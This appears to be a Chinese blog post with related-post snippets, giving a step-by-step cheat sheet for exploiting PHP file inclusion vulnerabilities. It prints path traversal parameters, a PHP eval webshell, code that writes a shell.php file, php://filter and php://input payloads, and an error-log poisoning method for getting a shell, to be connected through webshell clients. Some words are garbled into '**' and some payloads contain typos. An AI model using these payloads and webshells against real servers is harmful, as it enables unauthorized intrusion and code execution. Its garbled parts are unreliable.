web滲透 檔案包含漏洞利用

2021-10-10 20:48:14 字數 1230 閱讀 5717

(1) .讀取敏感檔案

利用檔案包含漏洞讀取任意檔案,讀取檔案的時候有利用條件

@目標主機檔案存在 (目標檔案的絕對路徑,相對路徑)

@具有檔案的可讀許可權

提交引數

絕對路徑

?path=c:\路徑\

嘗試相對路徑

?path=..\..\..\..\..\..\路徑\

(2) .直接包含木馬

將木馬資訊寫入附加資訊中

<?php @eval($_request[777])?>

使用菜刀連線

(3) .包含木馬寫shell

我們也可以將如下**寫入到中

<?php fputs(fopen('shell.php','w'),

"<?php @eval(\$_request[777])?>");

?>

改**含有是,在當前目錄下建立乙個名為shell.php 檔案

使用菜刀連線

http://ip

(4) .php封裝協議–訪問本地檔案

allow_url_include=on

?path=file://c:/路徑/

(5) .php封裝協議–傳輸php檔案

?path=php://filter/read=convert.base64-encode/resoure

=inc.php

將inc.php檔案展示在頁面中,利用base64解碼可獲取內容

(6) .php封裝協議–執行php命令

在burp包頭中

get /path.php?path=php://input

文字內容執行命令

<?php phpinfo();?>

試題7 .已知**存在本地檔案包含漏洞,但沒有檔案上傳api(無法上傳檔案),

如何利用

1.利用**訪問記錄日誌getshell

構造http請求包頭

訪問檔案包含漏洞

利用蟻劍連線

?path=d:/phpstudy/apache/log/error.log

8 .利用**自動審計軟體

seay等軟體

檔案包含漏洞利用

一 檔案包含漏洞初步 1.原理 在通過php的相應函式 比如include request 666 引入檔案時,由於傳入的檔名沒有經過合理的校驗,從而操作了預想之外的檔案,就可能導致意外的檔案洩露甚至惡意的 注入。666 c windows system32 dirvers etc hosts 2....

web漏洞之檔案包含

伺服器執行php檔案時,可以通過檔案包含函式載入另乙個檔案中的php 並且當php來執行,這會為開發者節省大量的時間。這意味著您可以建立供所有網頁引用的標準頁首或選單檔案。當頁首需要更新時,您只更新乙個包含檔案就可以了,或者當您向 新增一張新頁面時,僅僅需要修改一下選單檔案 而不是更新所有網頁中的鏈...

滲透測試之本地檔案包含漏洞

本地檔案包含允許攻擊者通過瀏覽器包含乙個伺服器上的檔案。當乙個web應用程式在沒有正確過濾輸入資料的情況下,就有可能存在這個漏洞,該漏洞允許攻擊者操縱輸入資料 注入路徑遍歷字元 包含web伺服器的其他檔案 本地寫了乙個檔案包含php檔案 a get test include a 包含乙個內容為的jp...